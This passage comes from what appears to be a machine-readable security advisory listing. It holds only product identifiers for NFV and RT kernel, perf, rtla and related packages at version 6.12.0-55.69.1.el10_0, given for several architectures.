"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
